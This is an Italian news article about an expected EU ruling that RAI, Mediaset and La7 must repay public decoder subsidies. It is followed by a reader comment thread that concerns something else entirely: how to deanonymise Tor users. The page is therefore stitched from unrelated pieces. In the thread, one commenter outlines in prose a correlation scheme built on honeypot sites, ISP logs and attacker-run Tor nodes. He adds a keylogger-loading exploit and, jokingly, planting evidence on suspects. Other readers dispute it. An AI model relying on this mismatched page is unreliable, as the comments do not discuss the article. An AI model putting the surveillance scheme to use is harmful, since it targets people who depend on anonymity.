DTT, in arrivo la condanna europea

Si ritiene che entro due o tre settimane l'Unione Europea ufficializzi la condanna a carico di quei network televisivi che hanno beneficiato dei contributi per l'acquisto dei decoder. Si parla di obbligo di rimborso. I consumatori: era ora

Roma – Notizie certe ancora non ce ne sono ma le indiscrezioni rivelate dal quotidiano LaRepubblica acquistano consistenza di ora in ora: entro Natale dovrebbe arrivare dalla Commissione Europea una condanna ai danni dei network televisivi italiani che hanno beneficiato dei 220 milioni di euro di contributi pubblici per l’acquisto dei decoder della televisione digitale terrestre (DTT).

La condanna dovrebbe piovere quindi su RAI, Mediaset e La7 e non solo sui rivenditori di decoder: l’idea è che siano state le televisioni, in linea con quanto previsto dalla controversa Legge Gasparri, ad aver beneficiato nei fatti dei finanziamenti pensati per dar vita ad un nuovo mercato televisivo.

A seguire la condanna sarà la richiesta di rimborso che pioverà con ogni probabilità sui tre colossi del sistema televisivo italiano.

I consumatori sono i primi ad aver espresso soddisfazione per le notizie che arrivano da Bruxelles, pur in assenza di qualsiasi conferma ufficiale. Il Movimento difesa del Cittadino (MDC), in una nota si dice soddisfatto perché la richiesta di rimborso è destinata a scattare anche per i network che hanno beneficiato dell’operazione voluta dal Governo tra il 2004 e il 2005 “anziché – scrive MDC -, come prevedeva un’altra ipotesi avanzata dal ministro Gentiloni, ai soli rivenditori di decoder”. Secondo MDC la richiesta di rimborso dovrebbe essere estesa anche ai produttori dei dispositivi di ricezione del DTT.

“Per anni – dichiara Francesco Luongo dell’MDC – abbiamo protestato e presentato ricorsi contro i regali dello Stato alle reti TV e ai produttori di decoder per il DTT. Ora, finalmente l’Unione Europea pare sia pronta ad attuare una concreta azione contro lo scandalo della Legge Gasparri. Quest’ultima garantiva, infatti, sulla nuova TV digitale terrestre un nuovo monopolio (Rai, Mediaset e La7), alla faccia del pluralismo tanto sbandierato dall’ex ministro Gasparri”.

Non tutto è deciso: quando la condanna sarà ufficiale, il Governo avrà l’onere di decidere quale somma ciascuno dei soggetti coinvolti dovrà rimborsare. Una fase delicata, destinata a stabilire in un certo senso anche la “quota di responsabilità” dei network televisivi. “Ci auguriamo – sottolinea Luongo – che il Governo individui correttamente i meccanismi di finanziamento e le aziende che maggiormente hanno goduto dei privilegi concessi da Gasparri”.

Le novità dall’Europa non sembrano intanto far perdere vitalità all’azione di alcuni dei protagonisti della vicenda. Proprio in questi giorni Mediaset porta avanti la propria campagna acquisti per rafforzare risorse e presenza nel DTT.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    State tranquilli,
    è tutto legale!
  • Gatto Selvaggio scrive:
    Spiando un nodo in uscita
    è possibile compilare un elenco di URI richiesti corredato di data e ora, e confrontarlo con le richieste a TOR avvenute in tale data e ora (approssimativamente) lette nei log dei provider.Associando i contenuti richiesti alle identità dei richiedenti.O no?Gatto perplesso
    • Anonimo scrive:
      Re: Spiando un nodo in uscita
      - Scritto da: Gatto Selvaggio
      è possibile compilare un elenco di URI richiesti
      corredato di data e ora, e confrontarlo con le
      richieste a TOR avvenute in tale data e ora
      (approssimativamente) lette nei log dei
      provider.

      Associando i contenuti richiesti alle identità
      dei
      richiedenti.

      O no?
      No!
      Gatto perplessodirei Ignorante... oltre che perplesso!dato che "l'ingresso" è semplicemente un altro tor e non un "richiedente" che può essere arbitrariamente lontano in termini di "hops"...
      • staza scrive:
        Re: Spiando un nodo in uscita
        sicuramente ignorante, altrimenti non avrebbe posto il quesito... ti pare? :)quindi le ultime tre righe tue te le potevi anche risparmiare
      • Gatto Selvaggio scrive:
        Re: Spiando un nodo in uscita

        dato che "l'ingresso" è semplicemente un altro
        tor e non un "richiedente" che può essere
        arbitrariamente lontano in termini di
        "hops"...Non ho capito... sògnnorante!Dunque: metto su un sito civetta con contenuti illegali, che registri data e ora di tutte le richieste provenienti da IP appartenenti a server TOR; oppure spio una serie di siti - che ne so, pago gente che lavora in sala server per installare sniffer software o hardware.Dall'altra parte, leggo dai tabulati Telecom gli accessi a IP corrispondenti a server TOR.Confronto date e ore: da una parte collego determinati contenuti richiesti con ora e data, dall'altra ore e date simili con le identità dei richiedenti.TOR non introduce un ritardo casuale come i remailer anonimi, né avrebbe senso farlo per richieste sul web.Dov'è che questo metodo non funziona?
        • Anonimo scrive:
          Re: Spiando un nodo in uscita
          - Scritto da: Gatto Selvaggio

          dato che "l'ingresso" è semplicemente un altro

          tor e non un "richiedente" che può essere

          arbitrariamente lontano in termini di

          "hops"...

          Non ho capito... sògnnorante!

          Dunque: metto su un sito civetta con contenuti
          illegali, che registri data e ora di tutte le
          richieste provenienti da IP appartenenti a server
          TOR; oppure spio una serie di siti - che ne so,
          pago gente che lavora in sala server per
          installare sniffer software o
          hardware.

          Dall'altra parte, leggo dai tabulati Telecom gli
          accessi a IP corrispondenti a server
          TOR.

          Confronto date e ore: da una parte collego
          determinati contenuti richiesti con ora e data,
          dall'altra ore e date simili con le identità dei
          richiedenti.
          TOR non introduce un ritardo casuale come i
          remailer anonimi, né avrebbe senso farlo per
          richieste sul
          web.

          Dov'è che questo metodo non funziona?Forse nel fatto che ogni istante ci sono richieste a server Tor che non sono loggate da Telecom... Come dimostrare che una richiesta a un server Tor corrisponde a quella di un sito monitorato e non vi qualcun'altro che ha fatto quella richiesta? Si dovrebbe monitorare tutta la rete Tor, immagino. E un evento probabile non è una prova, finché non cambiano la Costituzione. (Ma i magistrati possono sempre sorpassare queste inezie, soprattutto contro chi ha dei precedenti; tanto, anche se sbagliano, non pagano mai.) Se tutte le richieste a server Tor passasse da telecom allora sarebbe fattibile. Inoltre se hai installato Tor come server nessuno può sapere se sei tu a collegarti alla rete o qualcun'altro che passa dal tuo nodo, posto che un po' di traffico è sempre presente. a meno di non monitorare tutto il traffico e tutte le richieste (comunque criptate)Passo la parola a Wakko...Tor User
          • Gatto Selvaggio scrive:
            Re: Spiando un nodo in uscita

            Forse nel fatto che ogni istante ci sono
            richieste a server Tor che non sono loggate da
            Telecom... Come dimostrare che una richiesta a un
            server Tor corrisponde a quella di un sito
            monitorato e non vi qualcun'altro che ha fatto
            quella richiesta?Io pensavo a uno scenario simile:creo i sitianonymousmoneylaundering.comesplosivifattincasa.netgnagnagiovane.orgcon i quali presumo di coprire un buon numero di interessi potenzialmente illeciti, e registro le richieste a tali siti provenienti da IP TOR.Il mio ragionamento presume che gli IP dei server TOR siano noti.Se il 2006.12.11 16.32 registro un accesso da TOR a gnagnagiovane.org, consultando i log di varie Telecom di vari paesi noto che tra le 16.31 e le 16.33 si sono verificati un certo numero di richieste a server TOR.Certamente ciò non prova che e quale di queste richieste corrispondano all'accesso al sito proibitissimo, però intanto memorizzo nomi e cognomi.Ripetendo per mesi e mesi, l'elenco di nomi e cognomi diviene sterminato, ma alcuni di essi si segnalano per l'alto numero di corrispondenze.Costruita una lista di sospettabili, li controllo più strettamente, ad esempio ponendo su gnagnagiovane un qualche exploit che carica un keylogger, controllando se risultano loro pagamenti con carta di credito a siti analoghi, eccetera.Infine, perquisendo le abitazioni dei più promettenti con qualche pretesto, qualcosa salta sicuramente fuori, come - UUH! - un hard disk cifrato, e se non salta niente gli metto io una busta di cocaina.
          • Wakko Warner scrive:
            Re: Spiando un nodo in uscita
            - Scritto da: Gatto Selvaggio

            Forse nel fatto che ogni istante ci sono

            richieste a server Tor che non sono loggate da

            Telecom... Come dimostrare che una richiesta a
            un

            server Tor corrisponde a quella di un sito

            monitorato e non vi qualcun'altro che ha fatto

            quella richiesta?

            Io pensavo a uno scenario simile:

            creo i siti

            anonymousmoneylaundering.com
            esplosivifattincasa.net
            gnagnagiovane.org

            con i quali presumo di coprire un buon numero di
            interessi potenzialmente illeciti, e registro le
            richieste a tali siti provenienti da IP
            TOR.

            Il mio ragionamento presume che gli IP dei server
            TOR siano
            noti.

            Se il 2006.12.11 16.32 registro un accesso da TOR
            a gnagnagiovane.org, consultando i log di varie
            Telecom di vari paesi noto che tra le 16.31 e le
            16.33 si sono verificati un certo numero di
            richieste a server
            TOR.
            Certamente ciò non prova che e quale di queste
            richieste corrispondano all'accesso al sito
            proibitissimo, però intanto memorizzo nomi e
            cognomi.
            Ripetendo per mesi e mesi, l'elenco di nomi e
            cognomi diviene sterminato, ma alcuni di essi si
            segnalano per l'alto numero di
            corrispondenze.
            Costruita una lista di sospettabili, li controllo
            più strettamente, ad esempio ponendo su
            gnagnagiovane un qualche exploit che carica un
            keylogger, controllando se risultano loro
            pagamenti con carta di credito a siti analoghi,
            eccetera.
            Infine, perquisendo le abitazioni dei più
            promettenti con qualche pretesto, qualcosa salta
            sicuramente fuori, come - UUH! - un hard disk
            cifrato, e se non salta niente gli metto io una
            busta di
            cocaina.Considera che comunque non puoi controllare tutti gli exit-node Tor che sono sparsi su tutto il territorio mondiale e non sai da quale di questi exit-node le richieste usciranno.L'analisi dei log poi, almeno per il momento, richiede l'autorizzazione della magistratura che può solo darli per casi specifici e non "in generale". Ossia... se tu sei sospettato guardano il TUO log, non quello del tuo vicino di casa. Quindi un controllo come quello che prevedi tu al momento attuale non è possibile... sia perché richiede risorse enormi sia per la natura fortemente distribuita degli exit-node Tor.Se io avessi accesso a tutti gli exit-node e a tutti i log allora un analisi statistica come quella da te prevista potrebbe avere un certo numero di successi... ma è qualcosa che, almeno per il momento, va al di là delle capacità di chiunque, forze dell'ordine incluse.
          • Wakko Warner scrive:
            Re: Spiando un nodo in uscita
            Ah, fra l'altro, se nel file di config. di Tor tu imposti l'opzione "FascistFirewall" a "1" (mi pare che adesso puoi anche scegliere le porte) lui userà per trasferire i suoi dati solo la porta 80 (http) e 443 (https) quindi sarebbe ancora più difficile rilevarlo guardando solo i log delle connessioni.Ma insomma, per il momento non ce né bisogno.
          • Anonimo scrive:
            Re: Spiando un nodo in uscita

            Considera che comunque non puoi controllare tutti
            gli exit-node Tor che sono sparsi su tutto il
            territorio mondiale e non sai da quale di questi
            exit-node le richieste
            usciranno.Ma soprattutto non può controllare tutti gli ISP del mondo, per sapere chi si collega a Tor e poterlo escludere al fine di identificare in modo univoco un collegamento alla rete Tor.
            L'analisi dei log poi, almeno per il momento,
            richiede l'autorizzazione della magistratura che
            può solo darli per casi specifici e non "in
            generale". Ossia... se tu sei sospettato guardano
            il TUO log, non quello del tuo vicino di casa.
            Quindi un controllo come quello che prevedi tu al
            momento attuale non è possibile... sia perché
            richiede risorse enormi sia per la natura
            fortemente distribuita degli exit-node
            Tor.Anche se fosse possibile, come è possibile identificare in modo univoco un collegamento alla rete Tor in una data ora, se non escludendo tutti gli altri (impossibile senza tutti i log di tutti gli ISP mondiali)? La risposta è solo una: criminalizzando chiunque usi Tor.
            Se io avessi accesso a tutti gli exit-node e a
            tutti i log allora un analisi statistica come
            quella da te prevista potrebbe avere un certo
            numero di successi... ma è qualcosa che, almeno
            per il momento, va al di là delle capacità di
            chiunque, forze dell'ordine
            incluse.Immagino che anche controllando tutti gli exit node non sia possibile, partendo da questi, stabilire da dove provenga la richiesta, nemmeno da quale ISP, in quanto la stessa passa da server tor intermedi. E a meno di non monitorarli tutti... Tutto deve partire dall'analisi dei Log di tutti gli ISP ma per forza di cose questa è sempre incompleta. E' così? Oppure è possibile stabilire con certezza da quali ISP avviene una richiesta?
          • Anonimo scrive:
            Re: Spiando un nodo in uscita

            Se il 2006.12.11 16.32 registro un accesso da TOR
            a gnagnagiovane.org, consultando i log di varie
            Telecom di vari paesi noto che tra le 16.31 e le
            16.33 si sono verificati un certo numero di
            richieste a server
            TOR.Dovresti avere i log di tutte le "telecom" mondiali per sapere chi si collega a Tor. Se ne manca una, nessuna richiesta è identificabile in modo univoco. Per farlo, è necessario che tutte le altre richieste/collegamenti-a-Tor siano escluse. Praticamente impossibile
            Certamente ciò non prova che e quale di queste
            richieste corrispondano all'accesso al sito
            proibitissimo, però intanto memorizzo nomi e
            cognomi.In altre parole, se usi Tor sei registrato come un probabile criminale...
            Ripetendo per mesi e mesi, l'elenco di nomi e
            cognomi diviene sterminato, ma alcuni di essi si
            segnalano per l'alto numero di
            corrispondenze.Che non provano nulla, tranne il fatto che uno si è collegato a Tor. (per ovviare a questo, basterebbe diffondere l'uso di Tor)
            Costruita una lista di sospettabili, li controllo....di sospettati... Se usare Tor troppo spesso rende sospettabili, siamo in uno stato di polizia. Qui serve la politica più che la tecnologia
            più strettamente, ad esempio ponendo su
            gnagnagiovane un qualche exploit che carica un
            keylogger, controllando se risultano loro
            pagamenti con carta di credito a siti analoghi,
            eccetera.Beh questo si può fare senza dover incriminare chiunque usi Tor
            Infine, perquisendo le abitazioni dei più
            promettenti con qualche pretesto, qualcosa salta
            sicuramente fuori,Questo non è un problema, sono espertissimi ad aggirare il diritto con le leggi
          • Gatto Selvaggio scrive:
            Rispondo ad entrambi
            Rispondo ad entrambi.Il metodo che ho esposto presume di considerare TOR una scatola chiusa dotata di ingressi e uscite, e confrontare le uscite con gli ingressi.
            Dovresti avere i log di tutte le "telecom" mondiali
            per sapere chi si collega a Tor. Se ne manca una,
            nessuna richiesta è identificabile in modo univoco.Non intendo associare in modo univoco, ma costruire statisticamente una lista di probabili utenti di siti proibiti. Non è necessario conoscere i log di tutto il mondo: se il mio obiettivo è ricercare sospetti italiani, leggo i log della telecom italiana.
            In altre parole, se usi Tor
            sei registrato come un probabile criminale...Immagino che giò ora ti si consideri 'uno che ha qualcosa da nascondere'. Ma non necessariamente: l'uso di siti civetta mirati serve a selezionare gli utenti interessati a un certo tipo di contenuti.
            Considera che comunque non puoi controllare
            tutti gli exit-node Tor che sono sparsi su
            tutto il territorio mondiale e non sai da
            quale di questi exit-node le richieste usciranno.Questa è un'obiezione sensata, perché il mio metodo presuppone di saper distinguere, fra gli accessi ai siti civetta, quelli provenienti da nodi TOR. Però posso accontentarmi di una conoscenza parziale, registrando i soli accessi ai siti civetta provenienti da nodi TOR noti. Ai dati così raccolti posso aggiungere quelli degli accessi provenienti da nodi TOR trappola, gestiti da me, a una lista di siti sospetti, che sono molti di più dei miei siti civetta.
            L'analisi dei log poi, almeno per il momento,
            richiede l'autorizzazione della magistratura
            che può solo darli per casi specifici
            e non "in generale".Le leggi possono cambiare. E comunque credo che servizi segreti e mafia operino ugualmente all'insaputa della magistratura. E poi nel 2000 ero socio in uno sfigatissimo ISP, e i carabinieri chiesero l'elenco degli indirizzi di posta elettronica dei nostri abbonati. Non vennero a chiedere informazioni su un abbonato particolare. È ovvio, per non rivelare dettagli su un'indagine in corso. Immagino che la validità legale delle prove raccolte si limiti a quelle pertinenti all'indagine autorizzata dalla magistratura, intanto però hanno raccolto anche altri dati. Immagino che quando chiedono alla Telecom i tabulati li chiedano in blocco, da data tale a data tale, senza ulteriori specificazioni.
            Se io avessi accesso a tutti gli exit-node
            e a tutti i log allora un analisi statistica
            come quella da te prevista potrebbe avere un
            certo numero di successi... ma è qualcosa che,
            almeno per il momento, va al di là delle
            capacità di chiunque, forze dell'ordine incluse.Credo invece che una analisi limitata basti.Ribadisco: supponiamo che in Italia vi sia un milione di utenti TOR. Sul mio sito civetta rilevo un accesso a una certa data e ora da un exit node TOR noto, e nei log dei provider vi sono centomila richieste GET corrispondenti (a server TOR noti, più o meno un minuto). Compilo una lista.Un altro giorno rilevo un accesso a un'altra data e ora, cui corrispondono duecentomila richieste GET. Un altro accesso al sito corrisponde a cinquantamila richieste. Iterando N volte determino N insiemi di potenziali sospetti, la cui intersezione mi dà un insieme di probabili sospetti che - a naso - al crescere di N diviene molto limitato.
          • Anonimo scrive:
            Re: Rispondo ad entrambi
            - Scritto da: Gatto Selvaggio
            Rispondo ad entrambi.

            Il metodo che ho esposto presume di considerare
            TOR una scatola chiusa dotata di ingressi e
            uscite, e confrontare le uscite con gli
            ingressi.


            Dovresti avere i log di tutte le "telecom"
            mondiali

            per sapere chi si collega a Tor. Se ne manca
            una,

            nessuna richiesta è identificabile in modo
            univoco.

            Non intendo associare in modo univoco, ma
            costruire statisticamente una lista di probabili
            utenti di siti proibiti. Non è necessario
            conoscere i log di tutto il mondo: se il mio
            obiettivo è ricercare sospetti italiani, leggo i
            log della telecom
            italiana.


            In altre parole, se usi Tor

            sei registrato come un probabile criminale...

            Immagino che giò ora ti si consideri 'uno che ha
            qualcosa da nascondere'. Ma non necessariamente:
            l'uso di siti civetta mirati serve a selezionare
            gli utenti interessati a un certo tipo di
            contenuti.


            Considera che comunque non puoi controllare

            tutti gli exit-node Tor che sono sparsi su

            tutto il territorio mondiale e non sai da

            quale di questi exit-node le richieste
            usciranno.

            Questa è un'obiezione sensata, perché il mio
            metodo presuppone di saper distinguere, fra gli
            accessi ai siti civetta, quelli provenienti da
            nodi TOR. Però posso accontentarmi di una
            conoscenza parziale, registrando i soli accessi
            ai siti civetta provenienti da nodi TOR noti. Ai
            dati così raccolti posso aggiungere quelli degli
            accessi provenienti da nodi TOR trappola, gestiti
            da me, a una lista di siti sospetti, che sono
            molti di più dei miei siti
            civetta.


            L'analisi dei log poi, almeno per il momento,

            richiede l'autorizzazione della magistratura

            che può solo darli per casi specifici

            e non "in generale".

            Le leggi possono cambiare. E comunque credo che
            servizi segreti e mafia operino ugualmente
            all'insaputa della magistratura. E poi nel 2000
            ero socio in uno sfigatissimo ISP, e i
            carabinieri chiesero l'elenco degli indirizzi di
            posta elettronica dei nostri abbonati. Non
            vennero a chiedere informazioni su un abbonato
            particolare. È ovvio, per non rivelare dettagli
            su un'indagine in corso. Immagino che la validità
            legale delle prove raccolte si limiti a quelle
            pertinenti all'indagine autorizzata dalla
            magistratura, intanto però hanno raccolto anche
            altri dati. Immagino che quando chiedono alla
            Telecom i tabulati li chiedano in blocco, da data
            tale a data tale, senza ulteriori
            specificazioni.


            Se io avessi accesso a tutti gli exit-node

            e a tutti i log allora un analisi statistica

            come quella da te prevista potrebbe avere un

            certo numero di successi... ma è qualcosa che,

            almeno per il momento, va al di là delle

            capacità di chiunque, forze dell'ordine incluse.

            Credo invece che una analisi limitata basti.

            Ribadisco: supponiamo che in Italia vi sia un
            milione di utenti TOR. Sul mio sito civetta
            rilevo un accesso a una certa data e ora da un
            exit node TOR noto, e nei log dei provider vi
            sono centomila richieste GET corrispondenti (a
            server TOR noti, più o meno un minuto). Compilo
            una
            lista.
            Un altro giorno rilevo un accesso a un'altra data
            e ora, cui corrispondono duecentomila richieste
            GET. Un altro accesso al sito corrisponde a
            cinquantamila richieste. Iterando N volte
            determino N insiemi di potenziali sospetti, la
            cui intersezione mi dà un insieme di probabili
            sospetti che - a naso - al crescere di N diviene
            molto
            limitato.Se installi Tor come Server, il tuo IP risulta sempre connesso a Tor, non solo in momenti particolari. E come fanno a sapere se sei tu a connetterti in un determinato momento o qualcuno che passa dal tuo nodo?
          • Gatto Selvaggio scrive:
            Re: Rispondo ad entrambi
            Stavo pensando a quelli che si connettono a TOR occasionalmente, ad esempio avevo in mente un articolo di PI di qualche tempo fa "Adesso TOR è un bottone per Firefox" o titolo simile.Però... se gestisco anche uno o più nodi, posso monitorare le singole richieste HTTP. La maggior parte delle volte il mio nodo riceverà richieste da altri nodi TOR, ma alcune volte funzionerà da nodo d'ingresso, ricevendo una richiesta direttamente da un utente che usa TOR.L'utente è sempre connesso a TOR: ogni sua richiesta HTTP viene inviata a un nodo TOR. A volte questo nodo è uno dei miei. Io non so cosa richieda né a chi, però conosco data e ora da incrociare con quelle delle richieste ricevute dai siti civetta.Il mio nodo d'ingresso possiede le seguenti informazioni: IP, data e ora. Dall'IP posso risalire all'identità consultando i log forniti dalla Telecom.Il mio sito civetta possiede le seguenti informazioni: data e ora, avvenuto accesso a contenuti illegali.Ad ogni accesso illegale al sito [alla mia rosa di siti] posso associare un elenco di potenziali sospetti, tra cui un Mario Rossi. Se lo stesso Mario Rossi figura in altri elenchi corrispondenti ad altri accessi al sito [siti], diventa fortemente sospetto.Il non semplice accesso ai log delle compagnie telefoniche rende in teoria difficile mettere in pratica questo metodo, ma per NSA e strutture simili tale accesso potrebbe essere, ad insaputa di tutti, più semplice (es. tramite backdoor sui server che contengono i log).
          • Anonimo scrive:
            Re: Rispondo ad entrambi
            E chi utilizza un server dovrebbe essere passibile di sequestro preventivo?Comunque, a che servirebbe alla fine questo metodo? A perseguire quale reato?
          • Gatto Selvaggio scrive:
            Re: Rispondo ad entrambi
            Non so. Sul sito di TOR ho letto di non prenderlo troppo sul serio per applicazioni critiche, e mi sono chiesto perché, dato che il funzionamento interno non pare lasci spazio allo spionaggio. Ho provato a immaginare possibili scenari in cui usare TOR non sia sicuro, e ho ipotizzato quello descritto.In un mondo controllato a tappeto (dall'NSA, ad esempio) TOR non è sicuro, non è una soluzione per collegarsi al conto bancario anonimo all'estero contenente cose che $Prodi vorrebbe per il $Bene del $Paese.Ora, non penso che l'NSA controlli proprio me. Ma ho letto di backdoor che i provider dovrebbero installare per rendere i loro computer trasparenti all'FBI, e ho letto del caso Aruba. Ci vuol nulla a emanare una legge per cui i provider debbano fornire account root alle forze dell'ordine senza farne parola. Al crescere della potenza di elaborazione e della capacità degli hard disk, il controllo continuo e sistematico di tutti diverrà una realtà.
          • Wakko Warner scrive:
            Re: Rispondo ad entrambi
            - Scritto da: Gatto Selvaggio
            Non so. Sul sito di TOR ho letto di non prenderlo
            troppo sul serio per applicazioni critiche, e mi
            sono chiesto perché, dato che il funzionamento
            interno non pare lasci spazio allo spionaggio. Ho
            provato a immaginare possibili scenari in cui
            usare TOR non sia sicuro, e ho ipotizzato quello
            descritto.
            In un mondo controllato a tappeto (dall'NSA, ad
            esempio) TOR non è sicuro, non è una soluzione
            per collegarsi al conto bancario anonimo
            all'estero contenente cose che $Prodi vorrebbe
            per il $Bene del
            $Paese.

            Ora, non penso che l'NSA controlli proprio me. Ma
            ho letto di backdoor che i provider dovrebbero
            installare per rendere i loro computer
            trasparenti all'FBI, e ho letto del caso Aruba.
            Ci vuol nulla a emanare una legge per cui i
            provider debbano fornire account root alle forze
            dell'ordine senza farne parola. Al crescere della
            potenza di elaborazione e della capacità degli
            hard disk, il controllo continuo e sistematico di
            tutti diverrà una
            realtà.Appunto per questo che strumenti come Tor sono e diventeranno sempre più necessari.Un attacco come quello che dici tu è al di là di qualunque forza, anche dell'NSA.Un'analisi statistica come quella che dici è pressocché impossibile perché:1) non sai da quale nodo la comunicazione dell'utente uscirà (e potrebbe essere [anzi... lo è quasi sicuramente] un nodo estero su cui non hai nessun controllo)2) dai nodi d'uscita tuoi locali ci può essere [anzi... c'è sicuramente] traffico proveniente dall'estero3) il traffico d'uscita dei vari nodi è continuo per l'elevato numero di utilizzatori quindi non puoi dire "ecco... questo è quello che è entrato nella rete 2 secondi fa"4) il delay fra ingresso e uscita dalla rete Tor dipende dal percorso seguito e ad ogni connessione il circuito (così come anche il nodo d'uscita) può cambiareInsomma, il tuo attacco, per poter essere applicabile, prevede:1) poter monitorare connessioni per mesi o addirittura anni (le indagini vanno a scaglioni di 6 mesi con durata massima 18 mesi [mi sembra]) 2) che tutti gli exit-node siano monitorabili (cosa non possibile perché in una data nazione ce né solo alcuni [pochi rispetto al totale])3) che ci siano pochi utenti per poter individuare chi entra e chi esce facilmente4) poter identificare, negli exit-node nazionali quale sia il traffico generato dall'interno della nazione e quale fuori (anche questo non possibile)-----------------------------------------------------------Modificato dall' autore il 13 dicembre 2006 18.38-----------------------------------------------------------
          • Gatto Selvaggio scrive:
            Re: Rispondo ad entrambi
            Non riesco a convincermi.Se supponiamo che qualcuno, perché la legge glielo permette o perché opera al di fuori della legge, abbia la possibilità di associare richieste in ingresso alla rete TOR a specifici utenti,se a un accesso al sito civetta da parte della rete TOR corrispondono N1 utenti da cui sono partite richieste a TOR di poco precedenti,a un altro accesso N2 utenti,...e se dall'intersezione degli insiemi di utenti risulta un certo numero N di utenti, tu non presumeresti euristicamente che questi siano potenziali utenti del sito civetta, da sottoporre a ulteriori indagini?
          • NaturaInnocence scrive:
            Re: Spiando un nodo in uscita
            - Scritto da: Gatto Selvaggio
            Io pensavo a uno scenario simile:

            creo i siti

            anonymousmoneylaundering.com
            esplosivifattincasa.net
            gnagnagiovane.org

            con i quali presumo di coprire un buon numero di
            interessi potenzialmente illeciti, e registro le
            richieste a tali siti provenienti da IP
            TOR.

            Il mio ragionamento presume che gli IP dei server
            TOR siano
            noti.

            Se il 2006.12.11 16.32 registro un accesso da TOR
            a gnagnagiovane.org, consultando i log di varie
            Telecom di vari paesi noto che tra le 16.31 e le
            16.33 si sono verificati un certo numero di
            richieste a server
            TOR.
            Certamente ciò non prova che e quale di queste
            richieste corrispondano all'accesso al sito
            proibitissimo, però intanto memorizzo nomi e
            cognomi.
            Ripetendo per mesi e mesi, l'elenco di nomi e
            cognomi diviene sterminato, ma alcuni di essi si
            segnalano per l'alto numero di
            corrispondenze.
            Costruita una lista di sospettabili, li controllo
            più strettamente, ad esempio ponendo su
            gnagnagiovane un qualche exploit che carica un
            keylogger, controllando se risultano loro
            pagamenti con carta di credito a siti analoghi,
            eccetera.
            Infine, perquisendo le abitazioni dei più
            promettenti con qualche pretesto, qualcosa salta
            sicuramente fuori, come - UUH! - un hard disk
            cifrato, e se non salta niente gli metto io una
            busta di
            cocaina.Cioè che dici non è possibile per un semplice motivo: quando fai una richiesta all'interno della rete tor, la tua richiesta prima di arrivare all'exit node(server tor) passa per altri nodi della rete(utenti normali) quindi l'exit node conosce solo l'ip dell'ultimo nodo della catena. Per arrivare a te dovrebbero controllare la richiesta effettuata all'exit node ad una certa ora, ricavare così l'ultimo nodo interno e controllarne la richiesta alla stessa ora, poi al penultimo ecc... Cosa impossibile da farsi visto che la tua richiesta avrà probabilmente fatto il giro del mondo.. senza contare il delay e l'altissimo numero di utenti interni alla rete...
        • Anonimo scrive:
          Re: Spiando un nodo in uscita
          - Scritto da: Gatto Selvaggio

          dato che "l'ingresso" è semplicemente un altro

          tor e non un "richiedente" che può essere

          arbitrariamente lontano in termini di

          "hops"...

          Non ho capito... sògnnorante!

          Dunque: metto su un sito civetta con contenuti
          illegali, che registri data e ora di tutte le
          richieste provenienti da IP appartenenti a server
          TOR; oppure spio una serie di siti - che ne so,
          pago gente che lavora in sala server per
          installare sniffer software o
          hardware.

          Dall'altra parte, leggo dai tabulati Telecom gli
          accessi a IP corrispondenti a server
          TOR.

          Confronto date e ore: da una parte collego
          determinati contenuti richiesti con ora e data,
          dall'altra ore e date simili con le identità dei
          richiedenti.
          TOR non introduce un ritardo casuale come i
          remailer anonimi, né avrebbe senso farlo per
          richieste sul
          web.

          Dov'è che questo metodo non funziona?http://punto-informatico.it/pm.aspx?m_id=1809574&id=1804412
    • Anonimo scrive:
      Re: Spiando un nodo in uscita
      - Scritto da: Gatto Selvaggio
      è possibile compilare un elenco di URI richiesti
      corredato di data e ora, e confrontarlo con le
      richieste a TOR avvenute in tale data e ora
      (approssimativamente) lette nei log dei
      provider.

      Associando i contenuti richiesti alle identità
      dei
      richiedenti.

      O no?

      Gatto perplessoLe comunicazioni tra te e il primo nodo tor, sono criptate, il provider non vede nessun URI, ma tanta "fuffa random".[img]http://tor.eff.org/images/htw2.png[/img]
      • Gatto Selvaggio scrive:
        Re: Spiando un nodo in uscita

        Le comunicazioni tra te e il primo nodo tor, sono
        criptate, il provider non vede nessun URI, ma
        tanta "fuffa random"."Tor client picks a random path to destination server. Green links are encrypted..."All'interno della rete TOR i server si scambiano pacchetti crittati in cui il mittente originale e il destinatario sono crittati insieme al contenuto, mentre sono in chiaro gli URL dei nodi che se li stanno scambiando in quel momento, o almeno del nodo destinatario (non significativi).Ma nel momento in cui nel mio browser clicco su un collegamento, il client TOR si intromette e appone il primo strato di cifratura sul mio IP, quello del destinatario e il contenuto, l'IP del server TOR a cui il pacchetto cifrato viene inviato è in chiaro e passa per il provider che mi dà la linea, no? E il mio anche, o no?Quindi la richiesta contiene:data e ora (da incrociare)IP di un server TOR (= attività sospetta)mia identità (non mi è chiaro se il mio IP viene trasmesso al provider come in una normale richiesta TCP/IP o oscurato da TOR, ma vuoi mica che il provider che mi dà la connessione non sappia quale utente si connette? e non lo registri?)Non conosco le reti a menadito e potrebbe sfuggirmi qualcosa, ma a me sembra che la richiesta in partenza porti con sé i dati sufficienti per essere incrociata con quella a destinazione.Quanto a quest'incrocio, è un'operazione che in media non dà frutti (la maggior parte delle richieste in partenza da utenti non riuscirà a essere messa in corrispondenza con un accesso al sito civetta) ma su grandi numeri dovrebbe dare risultati sufficienti.
  • Guybrush scrive:
    Tor Illegale? MAGARI!
    Provocazione?No.Tor e tutti i tool di anonimizzazione dovrebbero essere resi illegali al fine di proteggere gli utonti.Spiego.Per quelli che non hanno letto il contratto prima di firmarlo, quello col provider, perche' chi lo ha letto sa che e' cosi'.La responsabilita' di quello che l'utente ossia l'utilizzatore di username e password di connessione nonche' della linea ADSL la' dove c'e' quella, è tutta dell'intestatario.Non e' scritta proprio cosi' eh?Il concetto che salta fuori rimettendo insieme clausole, articoli e clausole vessatorie e' questo:il provider non è responsabile di niente, non sa niente, non vede niente non dice niente, non c'era e se c'era dormiva.Dall'account dell'intestatario passa la foto di un minore abusato in vario modo? Colpa dell'intestatario. Passa un worm? Sempre colpa dell'intestatario. Materiale protetto? Software pirata? Informazioni su come costituire una cellula di terroristi? Sempre responsabilita' dell'intestatario.Chi installa TOR o un altro software di anonimizzazione sul proprio PC, di fatto, si prende la responsabilita' dei contenuti diffusi da terzi e poco importa se poi alla polizia postale gli dice "ma io non sapevo!".Ok si puo' configurare TOR come nodo passante e allora i rischi sono molto ridotti, ma chi si candida a "nodo di uscita" e vive in Italia, be', non puo' dormire sonni tranquilli.Per la legge (e il contratto che ha firmato) qualunque cosa vien fatta col suo account e' sua responsabilita' fino a prova contraria.Insomma se un virus ti infetta il PC e attraverso il tuo PC viene attaccato il 